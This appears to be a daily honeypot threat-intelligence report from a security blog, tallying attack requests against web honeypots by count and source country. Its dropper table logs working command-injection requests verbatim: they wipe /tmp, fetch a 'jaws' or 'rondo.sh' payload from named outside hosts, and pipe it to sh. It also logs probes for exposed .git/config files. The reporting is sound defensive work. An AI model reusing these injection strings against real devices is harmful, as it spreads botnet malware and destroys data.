Skip to main content
  1. Daily-Posts/

Report: 2025-07-09

·338 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-09
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 11 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 4 new requests that have never been observed before (these were added to the monitored request database.).

A total of 556 requests were recorded during the day, originating from 11 different countries, with a peak of 220 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country

botnet_dropper_behaviour
#

remote_addrrequest
8.222.130.125GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.216.86.134GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.210.161.193GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
49.65.102.238GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.219.103.247GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.222.194.26GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.213.136.165GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
45.135.194.11GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F169.255.72.169%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F169.255.72.169%2Frondo.sh%7C%7Ccurl%20http%3A%2F%2F169.255.72.169%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1
8.222.236.162GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
47.242.136.130GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
43.142.121.147GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
134ABCDEFGHIJKLMNOPQRSTUVWXYZ9999
252GET /aws/.git/config HTTP/1.1
272GET /github/.git/config HTTP/1.1
641GET /api/contents?type=directory HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0220US
153HK
247DE
338NL
419PL
518IN
615CA
715RU
814JP
910GB
1010SG
119MU
128CN
138GH
147BG
157LT
166UA
176BE
185AO
195KR
204SC
213ES
223KZ
233AE
243IE
253BR
262TR
272EE
282MD
292IL
302VN
311BA
321SE
331AR
341GT
351IT
361BD
371GE

Related

Report: 2025-07-08
·431 words
Repport Daily
Report: 2025-07-07
·1787 words
Repport Daily
Report: 2025-07-06
·307 words
Repport Daily